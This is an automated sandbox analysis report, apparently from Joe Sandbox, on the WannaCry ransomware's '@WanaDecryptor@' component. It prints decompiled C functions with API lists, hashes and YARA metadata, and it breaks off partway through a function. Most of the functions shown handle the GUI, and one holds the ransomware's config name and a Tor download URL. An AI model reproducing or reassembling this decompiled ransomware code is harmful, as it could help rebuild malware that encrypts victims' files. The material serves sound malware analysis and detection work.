                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #823#825ExecuteMessageSendShell
                                                      • String ID: open
                                                      • API String ID: 1093558810-2758837156
                                                      • Opcode ID: 010bc53f78863e2019c084ea90a161dec355dfc7908859746d80e941f6143737
                                                      • Instruction ID: 5f9a2cd0b307edef7ddb37fa3a9b8e73568683458afc550aac563bbb23be8fd8
                                                      • Opcode Fuzzy Hash: 010bc53f78863e2019c084ea90a161dec355dfc7908859746d80e941f6143737
                                                      • Instruction Fuzzy Hash: 0C0148B0A50301AFE610DF24DD4AF5B77E8AB84B14F00C42AF9499B291E6B4E814CB96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004030E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 67%
                                                      			E004030E0(intOrPtr __ecx, intOrPtr _a4) {
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _t30;

				_push(0xffffffff);
				_push(E004135B3);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t30;
				_push(__ecx);
				_push(_a4);
				_push(0x8a);
				_v16 = __ecx;
				L00412C92();
				_v12 = 0;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0x60)) = 0x415b28;
				_v12 = 1;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0xa0)) = 0x415a58;
				 *((intOrPtr*)(__ecx + 0xe4)) = 0;
				 *((intOrPtr*)(__ecx + 0xe0)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0xf0)) = 0;
				 *((intOrPtr*)(__ecx + 0xec)) = 0x415a30;
				 *((intOrPtr*)(__ecx)) = 0x415958;
				 *((intOrPtr*)(__ecx + 0xf4)) = 0;
				 *[fs:0x0] = _v20;
				return __ecx;
			}







                                                      0x004030e0
                                                      0x004030e2
                                                      0x004030ed
                                                      0x004030ee
                                                      0x004030f5
                                                      0x004030ff
                                                      0x00403100
                                                      0x00403105
                                                      0x00403109
                                                      0x00403115
                                                      0x00403119
                                                      0x0040311e
                                                      0x0040312a
                                                      0x00403131
                                                      0x0040313a
                                                      0x00403140
                                                      0x00403146
                                                      0x00403150
                                                      0x00403156
                                                      0x00403160
                                                      0x00403166
                                                      0x00403171
                                                      0x0040317b

                                                      APIs
                                                      • #324.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403109
                                                      • #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403119
                                                      • #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403131
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #567$#324
                                                      • String ID: 0ZA$DZA
                                                      • API String ID: 784016053-3838179817
                                                      • Opcode ID: 6530db1bbd0e405eb5314e304be7278bbea559453e8c1a2ce06ca27fee27d17e
                                                      • Instruction ID: 8222d1989983ac506c5d09346421d66fb4ae1402eeff5ebed15e971907ed65db
                                                      • Opcode Fuzzy Hash: 6530db1bbd0e405eb5314e304be7278bbea559453e8c1a2ce06ca27fee27d17e
                                                      • Instruction Fuzzy Hash: 430169B1244B42CBD310CF19C580BDAFBE4FB84750F90892EE1AA9B741C3B864458B9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404C40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E00404C40(intOrPtr __ecx, intOrPtr _a4) {
				char _v12;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _t24;

				_push(0xffffffff);
				_push(E00413809);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t24;
				_push(__ecx);
				_push(_a4);
				_push(0x89);
				_v16 = __ecx;
				L00412C92();
				_v12 = 0;
				L00412DA6();
				 *((intOrPtr*)(__ecx + 0x68)) = 0;
				 *((intOrPtr*)(__ecx + 0x64)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x74)) = 0;
				 *((intOrPtr*)(__ecx + 0x70)) = 0x415a30;
				_push(0x421798);
				_v12 = 3;
				 *((intOrPtr*)(__ecx)) = 0x415ec8;
				L00412DA0();
				 *[fs:0x0] = _v24;
				return __ecx;
			}







                                                      0x00404c40
                                                      0x00404c42
                                                      0x00404c4d
                                                      0x00404c4e
                                                      0x00404c55
                                                      0x00404c5e
                                                      0x00404c5f
                                                      0x00404c64
                                                      0x00404c68
                                                      0x00404c70
                                                      0x00404c7a
                                                      0x00404c7f
                                                      0x00404c86
                                                      0x00404c8d
                                                      0x00404c94
                                                      0x00404c9b
                                                      0x00404ca2
                                                      0x00404ca7
                                                      0x00404cad
                                                      0x00404cba
                                                      0x00404cc4

                                                      APIs
                                                      • #324.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C68
                                                      • #540.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C7A
                                                      • #860.MFC42(00421798), ref: 00404CAD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #324#540#860
                                                      • String ID: 0ZA$DZA
                                                      • API String ID: 1048258301-3838179817
                                                      • Opcode ID: b0cfd1353d7ceadba60806c011dda0c8f49be3dfc720069eeb22ffbda53a051c
                                                      • Instruction ID: 18ed51ee5778a88a9d54698e5e0d11c9dbfb79b85878934ba46accb8ddaa74ae
                                                      • Opcode Fuzzy Hash: b0cfd1353d7ceadba60806c011dda0c8f49be3dfc720069eeb22ffbda53a051c
                                                      • Instruction Fuzzy Hash: 880169B1644B50DBD311DF09D605BAABBE4FBD1B24F004A1EF1928B790C7BC95488BDA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00408B40 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 78%
                                                      			E00408B40(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t23;
				int _t25;
				intOrPtr _t30;
				int _t38;
				int _t41;
				intOrPtr* _t43;
				int _t45;
				intOrPtr _t47;
				struct HDC__* _t50;
				intOrPtr _t52;

				_push(0xffffffff);
				_push(E0041407B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t52;
				_t47 = __ecx;
				_v20 = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x4166e0;
				_t23 =  *((intOrPtr*)(__ecx + 0x30));
				_t50 = 0;
				_v4 = 1;
				if(_t23 == 0) {
					 *((intOrPtr*)(__ecx + 8)) = 0;
					 *(__ecx + 4) = 0;
				} else {
					_t41 =  *(__ecx + 0x24);
					_t45 =  *(__ecx + 0x20);
					_t25 =  *((intOrPtr*)(__ecx + 0x2c)) - _t41;
					_t38 =  *((intOrPtr*)(__ecx + 0x28)) - _t45;
					_t30 =  *((intOrPtr*)(__ecx + 0x1c));
					if(__ecx != 0) {
						_t50 =  *(__ecx + 4);
					}
					BitBlt( *(_t30 + 4), _t45, _t41, _t38, _t25, _t50, _t45, _t41, 0xcc0020);
					_t23 =  *((intOrPtr*)(_t47 + 0x18));
					if(_t23 != 0) {
						_t23 =  *((intOrPtr*)(_t23 + 4));
						_push(_t23);
						_push( *((intOrPtr*)(_t47 + 4)));
						L00412E48();
					} else {
						_push(_t23);
						_push( *((intOrPtr*)(_t47 + 4)));
						L00412E48();
					}
				}
				_t43 = _t47 + 0x10;
				_v16 = _t43;
				 *_t43 = 0x415c00;
				_v4 = 2;
				L00412D52();
				 *_t43 = 0x415bec;
				_v4 = 0xffffffff;
				L00412E3C();
				 *[fs:0x0] = _v12;
				return _t23;
			}

















                                                      0x00408b40
                                                      0x00408b42
                                                      0x00408b4d
                                                      0x00408b4e
                                                      0x00408b5a
                                                      0x00408b5d
                                                      0x00408b61
                                                      0x00408b67
                                                      0x00408b6a
                                                      0x00408b6e
                                                      0x00408b76
                                                      0x00408bd0
                                                      0x00408bd3
                                                      0x00408b78
                                                      0x00408b78
                                                      0x00408b7e
                                                      0x00408b84
                                                      0x00408b8b
                                                      0x00408b8d
                                                      0x00408b92
                                                      0x00408b94
                                                      0x00408b94
                                                      0x00408ba7
                                                      0x00408bad
                                                      0x00408bb3
                                                      0x00408bc1
                                                      0x00408bc7
                                                      0x00408bc8
                                                      0x00408bc9
                                                      0x00408bb5
                                                      0x00408bb8
                                                      0x00408bb9
                                                      0x00408bba
                                                      0x00408bba
                                                      0x00408bb3
                                                      0x00408bd6
                                                      0x00408bd9
                                                      0x00408bdd
                                                      0x00408be5
                                                      0x00408bea
                                                      0x00408bf1
                                                      0x00408bf7
                                                      0x00408bff
                                                      0x00408c0b
                                                      0x00408c15

                                                      APIs
                                                      • BitBlt.GDI32(?,?,00000001,?,?,00000000,?,00000001,00CC0020), ref: 00408BA7
                                                      • #5785.MFC42(?,?,?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BBA
                                                      • #5785.MFC42(?,?,?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BC9
                                                      • #2414.MFC42(?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BEA
                                                      • #640.MFC42(?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BFF
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5785$#2414#640
                                                      • String ID:
                                                      • API String ID: 2719443296-0
                                                      • Opcode ID: 455b206eaea57f198628315411046c596a923de9ec41dd3bd07dbbe9fd6cacce
                                                      • Instruction ID: 86c9330ab4234590f1f3c164cda9a19739b95e23c8a4d3600225c259667158ab
                                                      • Opcode Fuzzy Hash: 455b206eaea57f198628315411046c596a923de9ec41dd3bd07dbbe9fd6cacce
                                                      • Instruction Fuzzy Hash: E1215CB5200B419FC324DF1ACA44A67FBE8EB88710F008A1EF59697781D7B8F8458B65
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404530 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 68%
                                                      			E00404530(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct HDC__* _v32;
				void* _v36;
				struct tagSIZE _v48;
				void* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				int _t21;
				void* _t22;
				intOrPtr _t41;

				_push(0xffffffff);
				_push(E004137C8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t41;
				_t21 =  *((intOrPtr*)(__ecx + 0x5a));
				if(_t21 == 0) {
					_t21 =  *((intOrPtr*)(__ecx + 0x58));
					if(_t21 != 0) {
						_push(__ecx);
						L00412DEE();
						_t22 = __ecx + 0x48;
						_push(_t22);
						_v8 = 0;
						L00412DCA();
						_t21 = GetTextExtentPoint32A(_v32,  *(__ecx + 0x40),  *( *(__ecx + 0x40) - 8),  &_v48);
						 *((intOrPtr*)(__ecx + 0x50)) = _v64;
						_push(_t22);
						 *((intOrPtr*)(__ecx + 0x54)) = _v60;
						L00412DCA();
						 *((char*)(__ecx + 0x5a)) = 1;
						_v32 = 0xffffffff;
						L00412DE8();
					}
				}
				 *[fs:0x0] = _v12;
				return _t21;
			}














                                                      0x00404536
                                                      0x00404538
                                                      0x0040453d
                                                      0x0040453e
                                                      0x0040454b
                                                      0x00404550
                                                      0x00404552
                                                      0x00404557
                                                      0x0040455a
                                                      0x0040455f
                                                      0x00404564
                                                      0x0040456b
                                                      0x0040456c
                                                      0x00404574
                                                      0x0040458d
                                                      0x0040459b
                                                      0x0040459e
                                                      0x004045a3
                                                      0x004045a6
                                                      0x004045af
                                                      0x004045b3
                                                      0x004045bb
                                                      0x004045c0
                                                      0x00404557
                                                      0x004045c6
                                                      0x004045d0

                                                      APIs
                                                      • #289.MFC42 ref: 0040455F
                                                      • #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
                                                      • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
                                                      • #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
                                                      • #613.MFC42 ref: 004045BB
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5789$#289#613ExtentPoint32Text
                                                      • String ID:
                                                      • API String ID: 888490064-0
                                                      • Opcode ID: a47064995aa8a6f4e8062305d7bd768f80382afea7fbb3e7ed5e4407e76e675d
                                                      • Instruction ID: e6b376e8f5faa3704f84febb4d8b873e9abde4cd399f019e979504a664a0483f
                                                      • Opcode Fuzzy Hash: a47064995aa8a6f4e8062305d7bd768f80382afea7fbb3e7ed5e4407e76e675d
                                                      • Instruction Fuzzy Hash: C8119DB5108780AFC310DF18D980B97BBE8EB88714F044A1DF49293681C7B8A845CB22
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406CF0 Relevance: 7.5, APIs: 5, Instructions: 48windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 71%
                                                      			E00406CF0(void* __ecx, intOrPtr _a4) {
				int _v12;
				intOrPtr _v20;
				void* _v28;
				char _v36;
				intOrPtr _v40;
				void* _v48;
				struct HWND__* _t16;
				void* _t21;
				void* _t34;
				intOrPtr _t36;

				_push(0xffffffff);
				_push(E00413E78);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t36;
				_t34 = __ecx;
				_t16 = __ecx + 0x4c0;
				if(_t16 != 0) {
					_t16 =  *(_t16 + 0x20);
				}
				SendMessageA(_t16, 0x445, 0, 0x4000000);
				_push(0);
				_push(_a4);
				L00412F44();
				_v12 = 0;
				_v48 =  &_v36;
				_v40 = E00406DA0;
				SendMessageA( *(_t34 + 0x4e0), 0x449, 2,  &_v48);
				L00412F3E();
				_t21 = E00406DC0(_t34);
				_v12 = 0xffffffff;
				L00412F38();
				 *[fs:0x0] = _v20;
				return _t21;
			}













                                                      0x00406cf6
                                                      0x00406cf8
                                                      0x00406cfd
                                                      0x00406cfe
                                                      0x00406d09
                                                      0x00406d0c
                                                      0x00406d14
                                                      0x00406d16
                                                      0x00406d16
                                                      0x00406d2c
                                                      0x00406d32
                                                      0x00406d34
                                                      0x00406d39
                                                      0x00406d55
                                                      0x00406d5d
                                                      0x00406d61
                                                      0x00406d69
                                                      0x00406d6f
                                                      0x00406d76
                                                      0x00406d7f
                                                      0x00406d87
                                                      0x00406d92
                                                      0x00406d9c

                                                      APIs
                                                      • SendMessageA.USER32(?,00000445,00000000,04000000), ref: 00406D2C
                                                      • #353.MFC42(?,00000000,?,?,?,?,?,?,?,?,?,?,767B20C0), ref: 00406D39
                                                      • SendMessageA.USER32 ref: 00406D69
                                                      • #1979.MFC42 ref: 00406D6F
                                                      • #665.MFC42 ref: 00406D87
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#1979#353#665
                                                      • String ID:
                                                      • API String ID: 3794212480-0
                                                      • Opcode ID: 3e8137c70926b1d8ee173e5193f7a8fccbc7f675bb9cd6243914618cf2aa9b36
                                                      • Instruction ID: 970bbd2b9484f858b006173e4a833a93101fbe0026f1fdcd253c6fb41473c1ec
                                                      • Opcode Fuzzy Hash: 3e8137c70926b1d8ee173e5193f7a8fccbc7f675bb9cd6243914618cf2aa9b36
                                                      • Instruction Fuzzy Hash: EA1170B1244701AFD210EF15C942F9BB7E4BF94B14F504A1EF156A72C0C7B8A905CB5A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00407DB0 Relevance: 7.5, APIs: 5, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E00407DB0(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v100;
				char _v196;
				void* _t14;
				intOrPtr _t16;
				intOrPtr _t22;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr _t26;
				void* _t28;

				 *[fs:0x0] = _t26;
				E00401000( &_v196, 0);
				_t24 = __imp__time;
				_v8 = 0;
				_t14 =  *_t24(0, _t23,  *[fs:0x0], E00413FA6, 0xffffffff);
				_t22 =  *0x4218a0; // 0x0
				_t28 = _t26 - 0xb8 + 4;
				if(_t14 - _t22 < 0x12c) {
					_v36 = 0;
				}
				_v32 = 0;
				L00412B72();
				_t16 = _v28;
				if(_t16 >= 0) {
					_t16 =  *_t24(0);
					_t28 = _t28 + 4;
					 *0x4218a0 = _t16;
				}
				 *0x4218a4 =  *0x4218a4 + 1;
				_v4 = 1;
				L00412C9E();
				_v4 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v12;
				return _t16;
			}


















                                                      0x00407dbe
                                                      0x00407dd2
                                                      0x00407dd7
                                                      0x00407ddf
                                                      0x00407dea
                                                      0x00407dec
                                                      0x00407df2
                                                      0x00407dfc
                                                      0x00407dfe
                                                      0x00407dfe
                                                      0x00407e0d
                                                      0x00407e18
                                                      0x00407e1d
                                                      0x00407e26
                                                      0x00407e2a
                                                      0x00407e2c
                                                      0x00407e2f
                                                      0x00407e2f
                                                      0x00407e34
                                                      0x00407e3e
                                                      0x00407e49
                                                      0x00407e52
                                                      0x00407e5d
                                                      0x00407e6a
                                                      0x00407e77

                                                      APIs
                                                        • Part of subcall function 00401000: #324.MFC42(0000008D,?,?,?,?,?,?,00413458,000000FF), ref: 00401029
                                                        • Part of subcall function 00401000: #567.MFC42(0000008D,?,?,?,?,?,?,00413458,000000FF), ref: 00401039
                                                      • time.MSVCRT ref: 00407DEA
                                                      • #2514.MFC42 ref: 00407E18
                                                      • time.MSVCRT ref: 00407E2A
                                                      • #765.MFC42 ref: 00407E49
                                                      • #641.MFC42 ref: 00407E5D
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: time$#2514#324#567#641#765
                                                      • String ID:
                                                      • API String ID: 3372871541-0
                                                      • Opcode ID: b8401119eccb86975bd1eb41a25b1802afd83000c8f18fd8393192857fb5272d
                                                      • Instruction ID: 27345a9b2c1eb8b6f7bb2a745056f56b64ece2280f016bc8de7da71c9126f67a
                                                      • Opcode Fuzzy Hash: b8401119eccb86975bd1eb41a25b1802afd83000c8f18fd8393192857fb5272d
                                                      • Instruction Fuzzy Hash: 4C11AD70A097809FE320EF24CA41BDA77E0BB94714F40462EE589872D0EB786445CB97
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004031A0 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 86%
                                                      			E004031A0(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t15;
				intOrPtr* _t24;
				intOrPtr* _t25;
				intOrPtr _t30;

				_push(0xffffffff);
				_push(E004135FF);
				_t15 =  *[fs:0x0];
				_push(_t15);
				 *[fs:0x0] = _t30;
				_v20 = __ecx;
				_v4 = 0;
				_t24 = __ecx + 0xec;
				_v16 = _t24;
				 *_t24 = 0x415c00;
				_v4 = 4;
				L00412D52();
				 *_t24 = 0x415bec;
				_t25 = __ecx + 0xe0;
				_v16 = _t25;
				 *_t25 = 0x415c00;
				_v4 = 5;
				L00412D52();
				 *_t25 = 0x415bec;
				_v4 = 1;
				L00412D4C();
				_v4 = 0;
				L00412D3A();
				_v4 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v12;
				return _t15;
			}











                                                      0x004031a0
                                                      0x004031a2
                                                      0x004031a7
                                                      0x004031ad
                                                      0x004031ae
                                                      0x004031bc
                                                      0x004031c0
                                                      0x004031c8
                                                      0x004031ce
                                                      0x004031d2
                                                      0x004031da
                                                      0x004031df
                                                      0x004031e4
                                                      0x004031ea
                                                      0x004031f0
                                                      0x004031f4
                                                      0x004031fc
                                                      0x00403201
                                                      0x0040320c
                                                      0x00403212
                                                      0x00403217
                                                      0x0040321f
                                                      0x00403224
                                                      0x0040322b
                                                      0x00403233
                                                      0x0040323e
                                                      0x00403248

                                                      APIs
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00403188), ref: 004031DF
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403201
                                                      • #616.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403217
                                                      • #693.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403224
                                                      • #641.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403233
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414$#616#641#693
                                                      • String ID:
                                                      • API String ID: 1164084425-0
                                                      • Opcode ID: 34bc8b48edd82315a510377cde5f302579feb69e69f968417769f9718486fe20
                                                      • Instruction ID: e1576da2e33af18b213473c47bce756763974573e8f92b07b932385a5cbbc76a
                                                      • Opcode Fuzzy Hash: 34bc8b48edd82315a510377cde5f302579feb69e69f968417769f9718486fe20
                                                      • Instruction Fuzzy Hash: FF112774108B82CAC300DF19C1413CAFBE8AFA5714F54891FE0A6972A2D7F851998BE6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040BE90 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 18stringCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0040BE90(char* _a4, char* _a8, char* _a12) {

				strncpy("s.wnry", _a4, 0x63);
				strncpy("https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip", _a8, 0x63);
				strncpy(0x4221ac, _a12, 0x63);
				return 0;
			}



                                                      0x0040be9c
                                                      0x0040bead
                                                      0x0040bebe
                                                      0x0040bec8

                                                      APIs
                                                      Strings
                                                      • s.wnry, xrefs: 0040BE97
                                                      • https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip, xrefs: 0040BEA8
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: strncpy
                                                      • String ID: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$s.wnry
                                                      • API String ID: 3301158039-3000313716
                                                      • Opcode ID: 903ad34784ae10f582f3ba96602ae2cf194015f8b356b40d98df9960d5e2a5fd
                                                      • Instruction ID: 9df85d4950b3c0e310111636eb28cd84c7ce5d082e56baf833a5c0d57e8a6ec4
                                                      • Opcode Fuzzy Hash: 903ad34784ae10f582f3ba96602ae2cf194015f8b356b40d98df9960d5e2a5fd
                                                      • Instruction Fuzzy Hash: 47D017B138C2007AE124BA96EE93E2A22959F88F05F50454AB744550C0E9E99BA0836A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00403AF0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 132fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 73%
                                                      			E00403AF0(void* __edi, void* __ebp) {
				int _v4;
				intOrPtr _v12;
				char _v1252;
				void _v2251;
				char _v2252;
				int _v2256;
				signed int _t43;
				signed char _t44;
				signed int _t52;
				signed int _t58;
				signed int _t75;
				signed int _t78;
				struct _IO_FILE* _t103;
				intOrPtr _t111;
				void* _t113;

				_push(0xffffffff);
				_push(E0041369B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t111;
